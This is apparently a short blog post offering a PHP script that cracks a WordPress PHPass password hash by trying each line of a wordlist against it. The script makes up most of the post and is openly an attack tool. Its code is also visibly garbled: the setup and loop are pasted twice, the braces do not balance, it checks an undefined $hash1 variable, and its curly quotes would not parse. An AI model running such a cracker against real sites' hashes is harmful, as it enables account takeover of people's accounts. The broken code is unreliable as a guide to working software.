Wordpress PHPass hash bruteforce PHP script
Ok so I was a bit bored and was curious to know how Wordpress handled its authentication, turns out that it uses Solar Designers PHPass class, so I’ve decided to write a very simple Wordpress Bruteforcer for it.
<?php
require_once(‘./class-phpass.php’); //available at http://www.openwall.com/phpass/
$hash = “\$P\$BaahIvdhRXW8Q419WC/alyMUsY7S8I.”; // remember to quote out the $’s
$wp_hasher = new PasswordHash(8, TRUE);
$handle = @fopen (“wordlist.txt”,“r”);
if ($handle)
{
while (!feof ($handle))
{
$pass = fgets ($handle, 512);
$pass = str_replace (“\n“, “”, $pass );
require_once(‘./class-phpass.php’); //available at http://www.openwall.com/phpass/
$hash = “\$P\$BaahIvdhRXW8Q419WC/alyMUsY7S8I.”; // remember to quote out the $’s
$wp_hasher = new PasswordHash(8, TRUE);
$handle = @fopen (“wordlist.txt”,“r”);
if ($handle)
{
while (!feof ($handle))
{
$pass = fgets ($handle, 512);
$pass = str_replace (“\n“, “”, $pass );
if ($wp_hasher->CheckPassword ($pass, $hash1 ))
{
echo “FOUND: “ . $hash . “=” . $pass . “\n“;
exit;
}
}
}
fclose ($handle);
?>
Does seem to run a bit slow, but it serves its purpose.. If there is enough demand for a faster version I’ll consider writing one up, till then, peace.
Filed under: security - No Pointless Response